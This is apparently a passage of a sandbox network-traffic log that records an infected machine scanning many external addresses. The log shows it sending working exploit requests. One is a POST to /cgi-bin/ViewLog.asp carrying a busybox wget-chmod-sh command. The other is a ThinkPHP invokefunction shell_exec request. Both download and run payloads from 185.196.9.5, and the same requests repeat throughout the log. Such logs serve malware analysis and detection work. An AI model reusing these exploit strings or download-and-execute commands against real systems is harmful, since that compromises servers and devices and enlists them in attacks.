Session ID	Source IP	Source Port	Destination IP	Destination Port
248	192.168.2.15	59226	31.207.36.247	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:05.700999975 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:06.262423038 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:06.440148115 CET	304	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:06 GMT Server: Apache Content-Length: 126 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
249	192.168.2.15	47256	94.187.111.241	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:05.722704887 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
250	192.168.2.15	37282	94.123.39.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:05.730190992 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
251	192.168.2.15	34812	94.121.108.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:05.734082937 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
252	192.168.2.15	48774	95.95.160.112	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:06.140763044 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
253	192.168.2.15	36624	94.123.126.0	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:06.162123919 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
254	192.168.2.15	57452	62.29.109.100	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:06.167464972 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
255	192.168.2.15	49672	112.199.233.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:06.878151894 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:07.190082073 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:04 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
256	192.168.2.15	52586	95.142.66.161	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:07.062119961 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:07.245829105 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:07 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
257	192.168.2.15	47038	95.237.168.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:07.070063114 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
258	192.168.2.15	45318	95.217.7.225	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:07.074022055 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:07.274651051 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:03:07 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
259	192.168.2.15	46856	95.86.108.194	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:07.107197046 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
260	192.168.2.15	43946	95.177.148.65	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:07.114484072 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:08.358174086 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:09.798325062 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:12.870059967 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:18.758178949 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:30.277882099 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:53.317704916 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:40.421212912 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
261	192.168.2.15	56404	95.100.231.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:08.210417032 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:08.506238937 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:08 GMT Date: Sun, 25 Feb 2024 18:03:08 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 38 38 26 23 34 36 3b 33 36 66 38 39 61 38 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.5d7e19b8.1708884188.36f89a88</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
262	192.168.2.15	60012	85.119.82.50	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:08.580914021 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:09.510092020 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:09.677818060 CET	1249	IN	HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 1064 Date: Sun, 25 Feb 2024 18:03:09 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 39 31 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.91 (Debian)</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
263	192.168.2.15	51144	94.187.119.216	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:08.618680000 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
264	192.168.2.15	46854	62.176.90.79	8080

Timestamp	Bytes transferred	Direction	Data
